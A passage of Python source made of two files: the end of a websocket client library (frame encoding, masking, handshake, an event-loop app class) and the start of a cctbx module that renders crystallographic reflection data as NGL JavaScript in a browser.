opcode=OPCODE_TEXT, mask=1, data=""):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
self.data = data
self.get_mask_key = os.urandom
def __str__(self):
return "fin=" + str(self.fin) \
+ " opcode=" + str(self.opcode) \
+ " data=" + str(self.data)
@staticmethod
def create_frame(data, opcode):
"""
create frame to send text, binary and other data.
data: data to send. This is string value(byte array).
if opcode is OPCODE_TEXT and this value is uniocde,
data value is conveted into unicode string, automatically.
opcode: operation code. please see OPCODE_XXX.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, unicode):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(1, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(self.fin << 7
| self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
| self.opcode)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7e)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7f)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
return mask_key + "".join(s)
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
_m = array.array("B", mask_key)
_d = array.array("B", data)
for i in list(range(len(_d))):
_d[i] ^= _m[i % 4]
return _d.tostring()
class WebSocket(object):
"""
Low level WebSocket interface.
This class is based on
The WebSocket protocol draft-hixie-thewebsocketprotocol-76
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
We can connect to the websocket server and send/recieve data.
The following example is a echo client.
>>> import websocket
>>> ws = websocket.WebSocket()
>>> ws.connect("ws://echo.websocket.org")
>>> ws.send("Hello, Server")
>>> ws.recv()
'Hello, Server'
>>> ws.close()
get_mask_key: a callable to produce new mask keys, see the set_mask_key
function's docstring for more details
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setscokopt.
sslopt: dict object for ssl socket option.
"""
def __init__(self, get_mask_key=None, sockopt=None, sslopt=None):
"""
Initalize WebSocket object.
"""
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
self.connected = False
self.sock = socket.socket()
for opts in sockopt:
self.sock.setsockopt(*opts)
self.sslopt = sslopt
self.get_mask_key = get_mask_key
# Buffers over the packets from the layer beneath until desired amount
# bytes of bytes are received.
self._recv_buffer = []
# These buffer over the build-up of a single frame.
self._frame_header = None
self._frame_length = None
self._frame_mask = None
self._cont_data = None
def fileno(self):
return self.sock.fileno()
def set_mask_key(self, func):
"""
set function to create musk key. You can custumize mask key generator.
Mainly, this is for testing purpose.
func: callable object. the fuct must 1 argument as integer.
The argument means length of mask key.
This func must be return string(byte array),
which length is argument specified.
"""
self.get_mask_key = func
def gettimeout(self):
"""
Get the websocket timeout(second).
"""
return self.sock.gettimeout()
def settimeout(self, timeout):
"""
Set the timeout to the websocket.
timeout: timeout time(second).
"""
self.sock.settimeout(timeout)
timeout = property(gettimeout, settimeout)
def connect(self, url, **options):
"""
Connect to url. url is websocket url scheme. ie. ws://host:port/resource
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> ws = WebSocket()
>>> ws.connect("ws://echo.websocket.org/",
... header={"User-Agent: MyProgram",
... "x-custom: header"})
timeout: socket timeout time. This value is integer.
if you set None for this value,
it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value,
the custom HTTP headers are added.
"""
hostname, port, resource, is_secure = _parse_url(url)
# TODO: we need to support proxy
self.sock.connect((hostname, port))
if is_secure:
if HAVE_SSL:
if self.sslopt is None:
sslopt = {}
else:
sslopt = self.sslopt
self.sock = ssl.wrap_socket(self.sock, **sslopt)
else:
raise WebSocketException("SSL not available.")
self._handshake(hostname, port, resource, **options)
def _handshake(self, host, port, resource, **options):
sock = self.sock
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: Upgrade")
if port == 80:
hostport = host
else:
hostport = "%s:%d" % (host, port)
headers.append("Host: %s" % hostport)
if "origin" in options:
headers.append("Origin: %s" % options["origin"])
else:
headers.append("Origin: http://%s" % hostport)
key = _create_sec_websocket_key()
headers.append("Sec-WebSocket-Key: %s" % key)
headers.append("Sec-WebSocket-Version: %s" % VERSION)
if "header" in options:
headers.extend(options["header"])
headers.append("")
headers.append("")
header_str = "\r\n".join(headers)
self._send(header_str)
if traceEnabled:
logger.debug("--- request header ---")
logger.debug(header_str)
logger.debug("-----------------------")
status, resp_headers = self._read_headers()
if status != 101:
self.close()
raise WebSocketException("Handshake Status %d" % status)
success = self._validate_header(resp_headers, key)
if not success:
self.close()
raise WebSocketException("Invalid WebSocket Header")
self.connected = True
def _validate_header(self, headers, key):
for k, v in _HEADERS_TO_CHECK.iteritems():
r = headers.get(k, None)
if not r:
return False
r = r.lower()
if v != r:
return False
result = headers.get("sec-websocket-accept", None)
if not result:
return False
result = result.lower()
value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
return hashed == result
def _read_headers(self):
status = None
headers = {}
if traceEnabled:
logger.debug("--- response header ---")
while True:
line = self._recv_line()
if line == "\r\n":
break
line = line.strip()
if traceEnabled:
logger.debug(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
headers[key.lower()] = value.strip().lower()
else:
raise WebSocketException("Invalid header")
if traceEnabled:
logger.debug("-----------------------")
return status, headers
def send(self, payload, opcode=ABNF.OPCODE_TEXT):
"""
Send the data as string.
payload: Payload must be utf-8 string or unicoce,
if the opcode is OPCODE_TEXT.
Otherwise, it must be string(byte array)
opcode: operation code to send. Please see OPCODE_XXX.
"""
frame = ABNF.create_frame(payload, opcode)
if self.get_mask_key:
frame.get_mask_key = self.get_mask_key
data = frame.format()
length = len(data)
if traceEnabled:
logger.debug("send: " + repr(data))
while data:
l = self._send(data)
data = data[l:]
return length
def send_binary(self, payload):
return self.send(payload, ABNF.OPCODE_BINARY)
def ping(self, payload=""):
"""
send ping data.
payload: data payload to send server.
"""
self.send(payload, ABNF.OPCODE_PING)
def pong(self, payload):
"""
send pong data.
payload: data payload to send server.
"""
self.send(payload, ABNF.OPCODE_PONG)
def recv(self):
"""
Receive string data(byte array) from the server.
return value: string(byte array) value.
"""
opcode, data = self.recv_data()
return data
def recv_data(self):
"""
Recieve data with operation code.
return value: tuple of operation code and string(byte array) value.
"""
while True:
frame = self.recv_frame()
if not frame:
# handle error:
# 'NoneType' object has no attribute 'opcode'
raise WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY, ABNF.OPCODE_CONT):
if frame.opcode == ABNF.OPCODE_CONT and not self._cont_data:
raise WebSocketException("Illegal frame")
if self._cont_data:
self._cont_data[1] += frame.data
else:
self._cont_data = [frame.opcode, frame.data]
if frame.fin:
data = self._cont_data
self._cont_data = None
return data
elif frame.opcode == ABNF.OPCODE_CLOSE:
self.send_close()
return (frame.opcode, None)
elif frame.opcode == ABNF.OPCODE_PING:
self.pong(frame.data)
def recv_frame(self):
"""
recieve data as frame from server.
return value: ABNF frame object.
"""
# Header
if self._frame_header is None:
self._frame_header = self._recv_strict(2)
b1 = ord(self._frame_header[0])
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xf
b2 = ord(self._frame_header[1])
has_mask = b2 >> 7 & 1
# Frame length
if self._frame_length is None:
length_bits = b2 & 0x7f
if length_bits == 0x7e:
length_data = self._recv_strict(2)
self._frame_length = struct.unpack("!H", length_data)[0]
elif length_bits == 0x7f:
length_data = self._recv_strict(8)
self._frame_length = struct.unpack("!Q", length_data)[0]
else:
self._frame_length = length_bits
# Mask
if self._frame_mask is None:
self._frame_mask = self._recv_strict(4) if has_mask else ""
# Payload
payload = self._recv_strict(self._frame_length)
if has_mask:
payload = ABNF.mask(self._frame_mask, payload)
# Reset for next frame
self._frame_header = None
self._frame_length = None
self._frame_mask = None
return ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
def send_close(self, status=STATUS_NORMAL, reason=""):
"""
send close data to the server.
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
self.send(struct.pack('!H', status) + reason, ABNF.OPCODE_CLOSE)
def close(self, status=STATUS_NORMAL, reason=""):
"""
Close Websocket object
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
try:
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
'''
if self.connected:
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
try:
self.send(struct.pack('!H', status) + reason, ABNF.OPCODE_CLOSE)
timeout = self.sock.gettimeout()
self.sock.settimeout(3)
try:
frame = self.recv_frame()
if logger.isEnabledFor(logging.ERROR):
recv_status = struct.unpack("!H", frame.data)[0]
if recv_status != STATUS_NORMAL:
logger.error("close status: " + repr(recv_status))
except:
pass
self.sock.settimeout(timeout)
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
'''
self._closeInternal()
def _closeInternal(self):
self.connected = False
self.sock.close()
def _send(self, data):
try:
return self.sock.send(data)
except socket.timeout as e:
raise WebSocketTimeoutException(e.args[0])
except Exception as e:
if "timed out" in e.args[0]:
raise WebSocketTimeoutException(e.args[0])
else:
raise e
def _recv(self, bufsize):
try:
bytes = self.sock.recv(bufsize)
except socket.timeout as e:
raise WebSocketTimeoutException(e.args[0])
except SSLError as e:
if e.args[0] == "The read operation timed out":
raise WebSocketTimeoutException(e.args[0])
else:
raise
if not bytes:
raise WebSocketConnectionClosedException()
return bytes
def _recv_strict(self, bufsize):
shortage = bufsize - sum(len(x) for x in self._recv_buffer)
while shortage > 0:
bytes = self._recv(shortage)
self._recv_buffer.append(bytes)
shortage -= len(bytes)
unified = "".join(self._recv_buffer)
if shortage == 0:
self._recv_buffer = []
return unified
else:
self._recv_buffer = [unified[bufsize:]]
return unified[:bufsize]
def _recv_line(self):
line = []
while True:
c = self._recv(1)
line.append(c)
if c == "\n":
break
return "".join(line)
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(self, url, header=[],
on_open=None, on_message=None, on_error=None,
on_close=None, keep_running=True, get_mask_key=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The arugment is this class object.
on_message: callbale object which is called when recieved data.
on_message has 2 arguments.
The 1st arugment is this class object.
The passing 2nd arugment is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st arugment is this class object.
The passing 2nd arugment is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The arugment is this class object.
keep_running: a boolean flag indicating whether the app's main loop should
keep running, defaults to True
get_mask_key: a callable to produce new mask keys, see the WebSocket.set_mask_key's
docstring for more information
"""
self.url = url
self.header = header
self.on_open = on_open
self.on_message = on_message
self.on_error = on_error
self.on_close = on_close
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT, data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException()
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock is not None:
self.sock.close()
def _send_ping(self, interval):
while True:
for i in list(range(interval)):
time.sleep(1)
if not self.keep_running:
return
self.sock.ping()
def run_forever(self, sockopt=None, sslopt=None, ping_interval=0):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setscokopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command every specified period(second)
if set to 0, not send automatically.
"""
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
try:
self.sock = WebSocket(self.get_mask_key, sockopt=sockopt, sslopt=sslopt)
self.sock.settimeout(default_timeout)
self.sock.connect(self.url, header=self.header)
self._callback(self.on_open)
if ping_interval:
thread = threading.Thread(target=self._send_ping, args=(ping_interval,))
thread.setDaemon(True)
thread.start()
while self.keep_running:
try:
data = self.sock.recv()
if data is None or self.keep_running == False:
break
self._callback(self.on_message, data)
except Exception, e:
# print str(e.args[0])
if "timed out" not in e.args[0]:
raise e
except Exception, e:
self._callback(self.on_error, e)
finally:
if thread:
self.keep_running = False
self.sock.close()
self._callback(self.on_close)
self.sock = None
def _callback(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception, e:
logger.error(e)
if logger.isEnabledFor(logging.DEBUG):
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
if __name__ == "__main__":
enableTrace(True)
ws = create_connection("ws://echo.websocket.org/")
print("Sending 'Hello, World'...")
ws.send("Hello, World")
print("Sent")
print("Receiving...")
result = ws.recv()
print("Received '%s'" % result)
ws.close()
|
jsview_3d.py
|
# TODO:
# - cached scenes
from __future__ import division
from libtbx.math_utils import roundoff
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from scitbx import graphics_utils
from cctbx import miller
from libtbx.utils import Sorry
from websocket_server import WebsocketServer
import threading, math, sys
from time import sleep
import os.path, time
import libtbx
import numpy as np
import webbrowser, tempfile
class ArrayInfo:
def __init__(self, millarr):
from iotbx.gui_tools.reflections import get_array_description
data = millarr.data()
if (isinstance(data, flex.int)):
data = [e for e in data if e!= display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
self.maxdata =max( data )
self.mindata =min( data )
self.maxsigmas = self.minsigmas = display.nanval
if millarr.sigmas() is not None:
data = millarr.sigmas()
self.maxsigmas =max( data )
self.minsigmas =min( data )
self.minmaxstr = "MinMaxValues:[%s; %s], MinMaxSigmaValues:[%s; %s]" \
%(roundoff(self.mindata), roundoff(self.maxdata), \
roundoff(self.minsigmas), roundoff(self.maxsigmas))
else:
self.minmaxstr = "MinMaxValues:[%s; %s]" %(roundoff(self.mindata), roundoff(self.maxdata))
self.labels = self.desc = ""
if millarr.info():
self.labels = millarr.info().label_string()
self.desc = get_array_description(millarr)
self.span = "HKLs: %s to %s" % \
( millarr.index_span().min(), millarr.index_span().max())
self.infostr = "%s (%s), %s %s, %s, d_min: %s" % \
(self.labels, self.desc, millarr.size(), self.span, self.minmaxstr, roundoff(millarr.d_min()))
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.miller_array = None
self.d_min = None
self.scene = None
self.NGLscriptstr = ""
self.cameratype = "orthographic"
self.url = ""
self.binarray = "Resolution"
self.icolourcol = 0
self.iradiicol = 0
self.isnewfile = False
self.binvals = []
self.workingbinvals = []
self.valid_arrays = []
self.otherscenes = []
self.othermaxdata = []
self.othermindata = []
self.othermaxsigmas = []
self.otherminsigmas = []
self.matchingarrayinfo = []
self.binstrs = []
self.mapcoef_fom_dict = {}
self.mprint = sys.stdout.write
if kwds.has_key('mprint'):
self.mprint = kwds['mprint']
self.nbin = 0
self.websockclient = None
self.lastmsg = ""
self.StartWebsocket()
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if kwds.has_key('htmlfname'):
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if kwds.has_key('jscriptfname'):
self.jscriptfname = kwds['jscriptfname']
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.UseOSBrowser = True
if kwds.has_key('UseOSBrowser'):
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrxelms = None
self.pendingmessage = None
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def set_miller_array (self, miller_array, merge=None, details="", valid_arrays=[]) :
if (miller_array is None):
return
self.miller_array = miller_array
self.valid_arrays = valid_arrays
self.merge = merge
self.d_min = miller_array.d_min()
array_info = miller_array.info()
self.binvals = [ miller_array.d_max_min()[1], miller_array.d_max_min()[0] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, miller_array.indices().size(), \
miller_array.space_group_info(), uc) )
self.construct_reciprocal_space(merge=merge)
def construct_reciprocal_space (self, merge=None) :
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
matchcolourindices = miller.match_indices(self.miller_array.indices(),
self.valid_arrays[self.icolourcol].indices() )
matchcolourarray = self.miller_array.select( matchcolourindices.pairs().column(0) )
matchradiiindices = miller.match_indices(self.miller_array.indices(),
self.valid_arrays[self.iradiicol ].indices() )
matchradiiarray = self.miller_array.select( matchradiiindices.pairs().column(0) )
matchcolourradiiindices = miller.match_indices(self.valid_arrays[self.icolourcol].indices(),
self.valid_arrays[self.iradiicol ].indices() )
#matchcolourradiiindices = miller.match_indices(matchcolourarray.indices(),
# matchradiiarray.indices() )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#matchcolourradiiarray = self.miller_array.select( matchcolourradiiindices.pairs().column(0) )
#commonindices = miller.match_indices(self.miller_array.indices(),
# matchcolourradiiarray.indices() )
commonindices = miller.match_indices(self.miller_array.indices(),
matchcolourradiiindices.paired_miller_indices(0) )
commonarray = self.miller_array.select( commonindices.pairs().column(0) )
commonarray.set_info(self.miller_array.info() )
commonarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#commonarray.size(), matchcolourradiiarray.size(), matchradiiarray.size(), matchcolourarray.size()
foms_array = None
if self.miller_array.is_complex_array():
fomcolm = self.mapcoef_fom_dict.get(self.miller_array.info().label_string())
if fomcolm:
#foms = self.valid_arrays[fomcolm].data().deep_copy()
foms_array = self.valid_arrays[fomcolm].deep_copy()
self.scene = display.scene(miller_array=self.miller_array, merge=merge,
settings=self.settings, foms_array=foms_array)
self.rotation_center = (0,0,0)
self.otherscenes = []
self.othermaxdata = []
self.othermindata = []
self.matchingarrayinfo = []
match_valarrays = []
# loop over all miller arrays to find the subsets of hkls common between currently selected
# miler array and the other arrays. hkls found in the currently selected miller array but
# missing in the subsets are populated populated with NaN values
for i,validarray in enumerate(self.valid_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
#matchindices = miller.match_indices(matchcolourradiiarray.indices(), validarray.indices() )
matchindices = miller.match_indices(self.miller_array.indices(), validarray.indices() )
#matchindices = miller.match_indices( commonarray.indices(), validarray.indices() )
#print validarray.info().label_string()
valarray = validarray.select( matchindices.pairs().column(1) )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if valarray.anomalous_flag() and not self.miller_array.anomalous_flag():
# valarray gets its anomalous_flag from validarray. But it cannot have more HKLs than self.miller_array
# so set its anomalous_flag to False if self.miller_array is not anomalous data
valarray._anomalous_flag = False
if not valarray.anomalous_flag() and self.miller_array.anomalous_flag():
# temporary expand other arrays to anomalous if self.miller_array is anomalous
valarray = valarray.generate_bijvoet_mates()
missing = self.miller_array.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in validarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
match_valindices = miller.match_indices(self.miller_array.indices(), valarray.indices() )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(validarray.info() )
match_valarrays.append( match_valarray )
for i,match_valarray in enumerate(match_valarrays):
foms = None
if match_valarray.is_complex_array():
fomcolm = self.mapcoef_fom_dict.get(match_valarray.info().label_string())
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if fomcolm:
foms = match_valarrays[fomcolm]
otherscene = display.scene(miller_array=match_valarray, merge=merge,
settings=self.settings, foms_array=foms)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to -1 of the colours and radii arrays before writing javascript
nplst = np.array( list( otherscene.data ) )
mask = np.isnan(nplst)
npcolour = np.array( list(otherscene.colors))
npcolourcol = npcolour.reshape( len(otherscene.data), 3 )
#npcolourcol[mask] = -1
otherscene.colors = flex.vec3_double()
otherscene.colors.extend( flex.vec3_double( npcolourcol.tolist()) )
"""
nplst = np.array( list( otherscene.radii ) )
mask = np.isnan(nplst)
npradii = np.array( list(otherscene.radii))
npradiicol = npradii.reshape( len(otherscene.data), 1 )
npradiicol[mask] = 0.2
otherscene.radii = flex.double( npradiicol.flatten().tolist())
"""
b = flex.bool([bool(math.isnan(e)) for e in otherscene.radii])
# replace any nan values with 0.2
otherscene.radii = otherscene.radii.set_selected(b, 0.2)
d = otherscene.data
if (isinstance(d, flex.int)):
d = [e for e in self.scene.data if e!= display.inanval]
if match_valarray.is_complex_array():
d = otherscene.ampl
maxdata =max( d )
mindata =min( d )
self.othermaxdata.append( maxdata )
self.othermindata.append( mindata )
maxsigmas = minsigmas = display.nanval
if otherscene.sigmas is not None:
d = otherscene.sigmas
maxsigmas = max( d )
minsigmas = min( d )
self.othermaxsigmas.append(maxsigmas)
self.otherminsigmas.append(minsigmas)
# TODO: tag array according to which otherscene is included
self.otherscenes.append( otherscene)
infostr = ArrayInfo(otherscene.miller_array).infostr
self.mprint("%d, %s" %(i, infostr) )
self.matchingarrayinfo.append(infostr)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#--- user input and settings
def update_settings (self) :
self.construct_reciprocal_space(merge=self.merge)
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
return msg
def process_pick_points (self) :
self.closest_point_i_seq = None
if (self.pick_points is not None) and (self.scene is not None) :
closest_point_i_seq = gltbx.viewer_utils.closest_visible_point(
points=self.scene.points,
atoms_visible=self.scene.visible_points,
point0=self.pick_points[0],
point1=self.pick_points[1])
if (closest_point_i_seq is not None) :
self.closest_point_i_seq = closest_point_i_seq
if (self.closest_point_i_seq is not None) :
self.scene.label_points.add(self.closest_point_i_seq)
self.GetParent().update_clicked(index=self.closest_point_i_seq)
#hkl, d_min, value = self.scene.get_reflection_info(
# self.closest_point_i_seq)
#self.GetParent().update_clicked(hkl, d_min, value)
else :
self.GetParent().update_clicked(index=None)
def UpdateBinValues(self, binvals = [] ):
self.binvals = binvals
def DrawNGLJavaScript(self):
if self.miller_array is None :
self.mprint( "A miller array must be selected for drawing" )
return
self.mprint("Composing NGL JavaScript...")
h_axis = self.scene.axes[0]
k_axis = self.scene.axes[1]
l_axis = self.scene.axes[2]
nrefls = self.scene.points.size()
Hstararrowstart = roundoff( [-h_axis[0]*100, -h_axis[1]*100, -h_axis[2]*100] )
Hstararrowend = roundoff( [h_axis[0]*100, h_axis[1]*100, h_axis[2]*100] )
Hstararrowtxt = roundoff( [h_axis[0]*102, h_axis[1]*102, h_axis[2]*102] )
Kstararrowstart = roundoff( [-k_axis[0]*100, -k_axis[1]*100, -k_axis[2]*100] )
Kstararrowend = roundoff( [k_axis[0]*100, k_axis[1]*100, k_axis[2]*100] )
Kstararrowtxt = roundoff( [k_axis[0]*102, k_axis[1]*102, k_axis[2]*102] )
Lstararrowstart = roundoff( [-l_axis[0]*100, -l_axis[1]*100, -l_axis[2]*100] )
Lstararrowend = roundoff( [l_axis[0]*100, l_axis[1]*100, l_axis[2]*100] )
Lstararrowtxt = roundoff( [l_axis[0]*102, l_axis[1]*102, l_axis[2]*102] )
# make arrow font size roughly proportional to radius of highest resolution shell
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
arrowstr = """
// xyz arrows
shape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origo');
//blue-x
shape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
shape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
shape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
shape.addText( %s, [ 0, 0, 1 ], %s, 'H');
shape.addText( %s, [ 0, 1, 0 ], %s, 'K');
shape.addText( %s, [ 1, 0, 0 ], %s, 'L');
""" %(str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt, fontsize,
Kstararrowtxt, fontsize, Lstararrowtxt, fontsize)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.othermindata[self.icolourcol]
maxcolourscalar = self.othermaxdata[self.icolourcol]
if self.settings.sigma_color:
mincolourscalar = self.otherminsigmas[self.icolourcol]
maxcolourscalar = self.othermaxsigmas[self.icolourcol]
span = maxcolourscalar - mincolourscalar
ln = 51
incr = span/ln
colourscalararray =flex.double()
colourgradarrays = []
val = mincolourscalar
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.otherscenes[self.icolourcol].miller_array.is_complex_array():
incr = 360.0/ln
val = 0.0
fom = 1.0
fomdecr = 1.0/ln
colourscalararray =flex.double()
for j in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
fomln = 10
fom = 1.0
fomdecr = 1.0/ln
fomarrays =[]
# make fomln fom arrays of size ln as to match size of colourscalararray when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(ln,fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ))
colourgradarray = colourgradarrays[0] # hack until fom greying has been fully implemented
else:
colourgradarray = graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme)
colourgradarray = colourgradarray * 255.0
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff(self.colourgradientvalues)
# colour gradient values to be used below as a <div> tag for the javascript below
colors = self.otherscenes[self.icolourcol].colors
radii = self.otherscenes[self.iradiicol].radii
points = self.scene.points
hkls = self.scene.indices
dres = self.scene.work_array.d_spacings().data()
colstr = self.scene.miller_array.info().label_string()
data = self.scene.data
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.workingbinvals = []
if not self.binarray=="Resolution":
self.workingbinvals = [ self.othermindata[self.binarray] - 0.1 , self.othermaxdata[self.binarray] + 0.1 ]
self.workingbinvals.extend( self.binvals )
self.workingbinvals.sort()
if self.workingbinvals[0] < 0.0:
self.workingbinvals.append(0.0)
self.workingbinvals.sort()
else:
self.workingbinvals = self.binvals
colstr = "dres"
self.nbin = len(self.workingbinvals)
for ibin in range(self.nbin):
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.workingbinvals):
if (ibin+1) == self.nbin:
return ibin
if d > binval and d <= self.workingbinvals[ibin+1]:
return ibin
raise Sorry("Should never get here")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if self.binarray=="Resolution":
bindata = dres
else:
bindata = self.otherscenes[self.binarray].data
if self.otherscenes[self.binarray].work_array.is_complex_array():
bindata = self.otherscenes[self.binarray].ampl
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
#ibin = data2bin( self.otherscenes[self.iarray].data[i] )
ibin = data2bin( bindata[i] )
spbufttip = 'H,K,L: %s, %s, %s' %(hkls[i][0], hkls[i][1], hkls[i][2])
spbufttip += '\ndres: %s ' %str(roundoff(dres[i]) )
spbufttip += '\' + AA + \''
for j,otherscene in enumerate(self.otherscenes):
ocolstr = self.valid_arrays[j].info().label_string()
odata = otherscene.data
od =""
if self.valid_arrays[j].is_complex_array():
if not math.isnan(otherscene.foms[i]):
od = str(roundoff(otherscene.ampl[i])) + ", " + str(roundoff(otherscene.phases[i]) ) + \
